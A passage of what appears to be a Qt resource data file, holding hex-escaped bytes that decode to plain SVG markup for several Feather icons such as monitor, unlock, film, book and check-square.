\x78\x3d\x22\x33\x22\x20\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x31\x38\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x38\x22\x20\x72\x78\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\
\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\
\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\
\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\x32\x3d\x22\x31\x32\
\x22\x20\x79\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\
\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x72\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x6e\x69\x74\
\x6f\x72\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\x20\
\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x34\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\
\x31\x3d\x22\x32\x31\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\
\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\
\x31\x37\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\
\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x42\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x6e\x6c\x6f\x63\
\x6b\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\
\x3d\x22\x31\x31\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x31\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x37\x20\x31\x31\
\x56\x37\x61\x35\x20\x35\x20\x30\x20\x30\x20\x31\x20\x39\x2e\x39\
\x2d\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x47\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x6f\x6c\x64\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x20\x34\x68\x38\
\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\x34\x20\x34\x20\x34\
\x20\x34\x20\x30\x20\x30\x20\x31\x2d\x34\x20\x34\x48\x36\x7a\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\
\x22\x4d\x36\x20\x31\x32\x68\x39\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x31\x20\x34\x20\x34\x20\x34\x20\x34\x20\x30\x20\x30\x20\x31\
\x2d\x34\x20\x34\x48\x36\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x4a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x6d\x22\
\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\x20\x79\x3d\x22\
\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\x22\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x32\x30\x22\x20\x72\x78\x3d\x22\x32\x2e\
\x31\x38\x22\x20\x72\x79\x3d\x22\x32\x2e\x31\x38\x22\x3e\x3c\x2f\
\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x37\
\x22\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x37\x22\x20\
\x79\x32\x3d\x22\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\
\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x37\x22\x20\x79\x32\x3d\x22\
\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\
\x78\x32\x3d\x22\x32\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x32\x22\x20\x79\x31\x3d\x22\x37\x22\x20\x78\x32\x3d\x22\x37\
\x22\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x22\x20\x79\x31\x3d\
\x22\x31\x37\x22\x20\x78\x32\x3d\x22\x37\x22\x20\x79\x32\x3d\x22\
\x31\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x31\x37\x22\
\x20\x78\x32\x3d\x22\x32\x32\x22\x20\x79\x32\x3d\x22\x31\x37\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x37\x22\x20\x78\x32\x3d\
\x22\x32\x32\x22\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xe6\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x64\x65\x70\
\x65\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x31\x32\x20\x32\x20\x32\x32\x20\x38\x2e\x35\
\x20\x32\x32\x20\x31\x35\x2e\x35\x20\x31\x32\x20\x32\x32\x20\x32\
\x20\x31\x35\x2e\x35\x20\x32\x20\x38\x2e\x35\x20\x31\x32\x20\x32\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x32\
\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x35\
\x2e\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x32\x20\
\x38\x2e\x35\x20\x31\x32\x20\x31\x35\x2e\x35\x20\x32\x20\x38\x2e\
\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x32\x20\x31\x35\x2e\x35\x20\x31\x32\x20\x38\x2e\x35\x20\x32\x32\
\x20\x31\x35\x2e\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\
\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\
\x32\x3d\x22\x38\x2e\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x59\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x6f\x6f\x6b\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x31\x39\x2e\
\x35\x41\x32\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x30\x20\x31\x20\
\x36\x2e\x35\x20\x31\x37\x48\x32\x30\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x2e\x35\x20\
\x32\x48\x32\x30\x76\x32\x30\x48\x36\x2e\x35\x41\x32\x2e\x35\x20\
\x32\x2e\x35\x20\x30\x20\x30\x20\x31\x20\x34\x20\x31\x39\x2e\x35\
\x76\x2d\x31\x35\x41\x32\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x30\
\x20\x31\x20\x36\x2e\x35\x20\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x68\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x64\x6f\x77\x6e\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\
\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\
\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\
\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x38\x20\x31\x32\x20\x31\x32\x20\
\x31\x36\x20\x31\x36\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\
\x22\x20\x79\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x87\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x65\x6e\x2d\x74\
\x6f\x6f\x6c\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\
\x32\x20\x31\x39\x6c\x37\x2d\x37\x20\x33\x20\x33\x2d\x37\x20\x37\
\x2d\x33\x2d\x33\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x20\x31\x33\x6c\x2d\x31\
\x2e\x35\x2d\x37\x2e\x35\x4c\x32\x20\x32\x6c\x33\x2e\x35\x20\x31\
\x34\x2e\x35\x4c\x31\x33\x20\x31\x38\x6c\x35\x2d\x35\x7a\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x20\x32\x6c\x37\x2e\x35\x38\x36\x20\x37\x2e\x35\x38\x36\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x31\x22\x20\x63\x79\x3d\x22\x31\x31\x22\
\x20\x72\x3d\x22\x32\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x2d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x6f\x75\x64\
\x2d\x64\x72\x69\x7a\x7a\x6c\x65\x22\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x39\x22\x20\x78\
\x32\x3d\x22\x38\x22\x20\x79\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\
\x22\x20\x79\x31\x3d\x22\x31\x33\x22\x20\x78\x32\x3d\x22\x38\x22\
\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\x20\x79\x31\
\x3d\x22\x31\x39\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\
\x3d\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\x20\x79\x31\x3d\x22\x31\
\x33\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x31\
\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x31\x22\x20\
\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x35\x22\x20\x78\x32\x3d\
\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\
\x20\x31\x36\x2e\x35\x38\x41\x35\x20\x35\x20\x30\x20\x30\x20\x30\
\x20\x31\x38\x20\x37\x68\x2d\x31\x2e\x32\x36\x41\x38\x20\x38\x20\
\x30\x20\x31\x20\x30\x20\x34\x20\x31\x35\x2e\x32\x35\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x59\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x63\x6b\
\x2d\x73\x71\x75\x61\x72\x65\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\x20\x31\x31\x20\
\x31\x32\x20\x31\x34\x20\x32\x32\x20\x34\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x31\x20\x31\x32\x76\x37\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x20\x32\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x2d\x32\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x2d\x32\x68\x31\x31\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
